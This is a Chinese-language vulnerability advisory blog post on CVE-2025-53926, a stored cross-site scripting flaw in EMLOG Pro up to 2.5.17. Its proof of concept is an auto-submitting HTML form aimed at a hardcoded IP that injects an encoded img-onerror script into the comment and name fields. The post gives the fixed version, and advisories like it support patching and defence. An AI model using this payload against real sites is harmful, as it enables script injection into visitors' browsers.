首页 网络安全 正文
  • 本文约521字,阅读需3分钟
  • 11
  • 0

EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53926

摘要

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中,由于错误而存储的跨站点脚本漏洞,被追踪为CVE-2025-53926,CVSS评分6.1。

EMLOG是一款轻量级开源博客和CMS建站系统,速度快、省资源、易上手,适合各种规模的站点搭建,该软件是基于PHP+MySQL开发。

一、基本情况

EMLOG Pro 2.5.17版本发布于2025年06月29日,增加获取草稿详情和草稿列表接口和文章审核挂载点,优化应用商店体验如自动加载等。

EMLOG Pro 2.5.17跨站点脚本漏洞CVE-2025-53926

栋科技漏洞库关注到EMLOG Pro 2.5.17及之前版本中,由于错误而存储的跨站点脚本漏洞,被追踪为CVE-2025-53926,CVSS评分6.1。

二、漏洞分析

CVE-2025-53926是EMLOG Pro受影响版本的跨站点脚本漏洞,远程攻击者可通过comment和comname参数注入任意web脚本或HTML。

具体而言,该漏洞是由于错误错误而存储的跨站点脚本(XSS)漏洞,漏洞被利用前提是受害者发送帖子请求,即被说服点击发送的URL。

三、POC概念验证

1、为了利用该漏洞,说服受害者访问准备好的网站,例如使用社交工程。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://91.99.136.120/emlog/index.php?action=addcom" method="POST">
      <input type="hidden" name="gid" value="1" />
      <input type="hidden" name="comment" value="&apos;&quot;&gt;&lt;h1&gt;abc&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;&lt;&#47;h1&gt;&#36;&#123;&#123;33&#45;11&#125;&#125;&lt;&apos;&quot;" />
      <input type="hidden" name="comname" value="abc&apos;&quot;&gt;&lt;h1&gt;abc&lt;&#47;h1&gt;&#36;&#123;&#123;33&#45;11&#125;&#125;&lt;&apos;&quot;" />
      <input type="hidden" name="commail" value="abc&#64;cba&#46;pl" />
      <input type="hidden" name="pid" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2、受害者被重定向,恶意JS代码被执行

四、影响范围

EMLOG Pro <= 2.5.17

五、修复建议

EMLOG Pro >= 2.5.18

六、参考链接

管理员已设置登录后刷新可查看



扫描二维码,在手机上阅读
评论
更换验证码
友情链接